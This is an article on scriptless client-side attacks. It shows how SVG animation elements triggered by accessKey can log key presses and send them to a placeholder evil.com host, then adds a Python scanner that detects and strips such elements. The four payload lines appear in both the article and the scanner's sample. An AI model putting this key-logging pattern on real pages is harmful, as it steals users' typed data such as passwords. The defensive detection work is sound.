Attacking the client without scripts (Scriptless Attacks)

Source: Internet
Author: User

As enterprises' security awareness and technical capability keep improving, attacks on servers have become harder and harder. Over the years, attackers have therefore paid more and more attention to client-side attack techniques, and cross-site scripting (XSS) is one of the most widely used. To defend against such attacks, security vendors have developed many ways to detect malicious scripts, and the NoScript add-on for Firefox goes as far as blocking all client-side scripts unless the user explicitly allows them. Recently, researchers abroad proposed "Scriptless Attacks": attacks that need no client-side script at all, yet still let an attacker steal sensitive personal data such as account names and passwords. This new attack technique immediately drew strong interest from security practitioners.

How, then, can an attacker mount an attack when the client forbids scripts entirely? The answer lies in the ever richer feature set of browsers. Take SVG (Scalable Vector Graphics), an XML-based markup language proposed by the W3C, the international web standards body, for describing two-dimensional vector graphics. Because SVG generates and manipulates images from text, it greatly improves browsers' interactivity and dynamic effects when handling image content. accessKey is an event trigger defined in SVG: an animation element whose begin attribute is accessKey(x) fires when the browser captures the key x. It is meant as a convenient way to operate on images from the keyboard, but it also lets an attacker build a key logger with little effort. Part of the code that implements such key logging follows (source: http://web2hack.org/blog/?p=89); each key press rewrites the link target to a URL that carries the pressed key:

    <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a"/>
    <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b"/>
    <set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c"/>
    <set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d"/>

The above is only one typical example of a No-Script attack. Attackers can also abuse various CSS-based effects to carry out further attacks; for lack of space they are not described here.
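From the defender's side, the pattern above is easy to recognise in an SVG document: a SMIL animation element (set, animate, ...) whose begin attribute uses accessKey(...), often combined with a rewrite of an href to an external URL. The following Python helper, added here as an example and not taken from the article or the linked blog, scans an SVG for such elements and strips them, which is the check a service accepting SVG uploads would want. The sample document, the function names scan_svg and strip_keylogger_elements, and the evil.com target are constructed for the illustration.

```python
"""Detect and strip SVG animation elements that turn key presses into requests
(the accessKey-triggered href rewriting described in the article).

Hypothetical helper, not from the original article. Standard library only; for
untrusted input in production, parse with defusedxml instead of ElementTree.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# SMIL animation elements that can rewrite attributes at runtime without script.
ANIMATION_TAGS = {"set", "animate", "animateMotion", "animateTransform", "animateColor"}
# begin="accessKey(x)" fires the animation when the user presses key x.
ACCESSKEY_RE = re.compile(r"accessKey\s*\(", re.IGNORECASE)
# Absolute or protocol-relative URL, i.e. a target outside the document.
EXTERNAL_URL_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def _reasons(el):
    """Return why an animation element looks like a scriptless key logger, or []."""
    if not isinstance(el.tag, str) or _local(el.tag) not in ANIMATION_TAGS:
        return []  # comments/PIs and ordinary drawing elements are never flagged
    reasons = []
    begin = el.get("begin", "")
    if ACCESSKEY_RE.search(begin):
        reasons.append(f"key-triggered animation: begin={begin!r}")
    target = el.get("attributeName", "")
    value = el.get("to", "") or el.get("values", "")
    # attributeName is a plain string such as "xlink:href" or "href".
    if target.split(":")[-1] == "href" and EXTERNAL_URL_RE.match(value):
        reasons.append(f"rewrites a link target to an external URL: {value!r}")
    return reasons


def scan_svg(svg_text):
    """Return a list of (tag, reasons) for every suspicious animation element."""
    root = ET.fromstring(svg_text)
    return [(_local(el.tag), _reasons(el)) for el in root.iter() if _reasons(el)]


def strip_keylogger_elements(svg_text):
    """Return the SVG with every flagged animation element removed."""
    root = ET.fromstring(svg_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):
        if el is not root and _reasons(el):
            parent_of[el].remove(el)
    return ET.tostring(root, encoding="unicode")


# Constructed sample: the article's four <set> elements wrapped in a minimal
# document, plus a harmless fade-in animation that must not be flagged.
SAMPLE_SVG = f"""<svg xmlns="{SVG_NS}" xmlns:xlink="{XLINK_NS}">
  <a xlink:href="#">
    <text y="20">press a key</text>
    <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a"/>
    <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b"/>
    <set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c"/>
    <set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d"/>
  </a>
  <rect width="10" height="10">
    <animate attributeName="opacity" begin="0s" dur="1s" from="0" to="1"/>
  </rect>
</svg>"""

if __name__ == "__main__":
    for tag, reasons in scan_svg(SAMPLE_SVG):
        print(f"<{tag}>: " + "; ".join(reasons))
    print(strip_keylogger_elements(SAMPLE_SVG))
```

The scan flags every animation element whose timing depends on a key press, independently of what it rewrites, and separately flags href rewrites pointing outside the document; the fade-in animate on the rect passes both checks. Stripping the elements rather than rejecting the whole file keeps legitimate SVG usable, but a service that never needs SMIL animation can simply reject any element from ANIMATION_TAGS.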
